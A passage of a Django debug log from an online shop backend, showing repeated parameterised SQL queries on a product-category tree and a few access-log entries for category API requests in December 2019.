"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 09:55:01,458 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 09:55:01,461 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 09:55:01,463 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 09:55:01,466 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 09:55:01,468 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 09:55:01] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 09:55:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 09:55:37,563 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 23; args=(23,) DEBUG 2019-12-20 09:55:37,567 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) [20/Dec/2019 09:55:37] "GET /api/v1/categories/23 HTTP/1.0" 200 223 DEBUG 2019-12-20 09:55:37,803 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 09:55:37,814 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 09:55:37,820 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 09:55:37,824 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 09:55:37,830 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 09:55:37,834 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 09:55:37,838 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 09:55:37,842 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 09:55:37,846 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 09:55:37,851 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 09:55:37,855 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 09:55:37,859 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 09:55:37,863 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 09:55:37,867 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 09:55:37,872 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 09:55:37,876 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 09:55:37,880 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 09:55:37,884 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 09:55:37,888 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 09:55:37,895 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 09:55:37,898 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 09:55:37,902 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 09:55:37,906 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 09:55:37,910 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 09:55:37,914 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 09:55:37,920 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 09:55:37,923 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 09:55:37,927 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 09:55:37,931 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 09:55:37,935 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 09:55:37,941 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 09:55:37,945 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 09:55:37,949 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 09:55:37,953 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 09:55:37,957 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 09:55:37,964 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 09:55:37,968 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 09:55:37,972 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 09:55:37,976 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 09:55:37,980 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 09:55:37,984 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 09:55:37,989 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 09:55:37,993 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 09:55:37,997 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 09:55:38,002 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 09:55:38,006 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 09:55:38] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 10:00:27,522 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 10:00:27,529 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 10:00:27,532 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 10:00:27,534 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 10:00:27,538 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 10:00:27,540 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 10:00:27,542 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 10:00:27,545 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 10:00:27,547 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 10:00:27,550 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 10:00:27,552 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 10:00:27,555 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 10:00:27,557 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 10:00:27,559 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 